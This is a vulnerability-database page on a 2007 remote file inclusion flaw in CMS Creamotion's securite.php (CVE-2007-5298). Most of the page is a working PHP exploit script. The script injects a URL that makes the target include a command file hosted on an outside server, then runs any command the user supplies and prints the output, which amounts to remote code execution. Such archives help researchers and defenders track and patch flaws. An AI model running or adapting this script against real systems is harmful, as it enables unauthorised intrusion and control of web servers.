Lucene search
+L

CMS Creamotion - 'securite.php' Remote File Inclusion

🗓️ 06 Oct 2007 00:00:00Reported by HACKERS PALType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

CMS Creamotion Remote File Inclusion

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-5298
9 Oct 200718:00
cve
Cvelist
CVE-2007-5298
9 Oct 200718:00
cvelist
EUVD
EUVD-2007-5278
7 Oct 202500:30
euvd
NVD
CVE-2007-5298
9 Oct 200718:17
nvd
Prion
Remote file inclusion
9 Oct 200718:17
prion
#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/*      CMS Creamotion - Remote File include
/*  This exploit should allow you to execute commands
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/*     CMS Creamotion Command Execution       */
/*    by HACKERS PAL <[email protected]>     */
/*         site: http://www.soqor.net         */');
if ($argc<3) {
	print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*    php '.$argv[0].' http://localhost/ id
/**********************************************/
');
	die;
}
error_reporting(0);
ini_set("max_execution_time",0);

$url=$argv[1];
$cmd=$argv[2];
$exploit="/_administration/securite.php?cfg[document_uri]=http://members.lycos.co.uk/soqor10/cmd.txt?";
$page=$url.$exploit;

Function get_page($url)
{

	if(function_exists("file_get_contents"))
	{

		$contents = file_get_contents($url);
	}
	else
	{
		$fp=fopen("$url","r");
		while($line=fread($fp,1024))
		{
			$contents=$contents.$line;
		}


	}
	return $contents;
}
$npage    = get_page($page);


if(eregi("Cannot execute a blank command",$npage))
{
	$pagecmd=$page."&cmd=$cmd";
	Die("\n[+] Exploit Is Working\n[+] Result For CMD : ".get_page($pagecmd)."\n[+] See The Vulnerabiliy article for more informations\n/*        Visit us : WwW.SoQoR.NeT            */\n/**********************************************/");
}
Else
{
	Die("\n[-] Exploit Failed\n/*        Visit us : WwW.SoQoR.NeT            */\n/**********************************************/");
}
#WwW.SoQoR.NeT
?>

# milw0rm.com [2007-10-06]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Oct 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.0743
33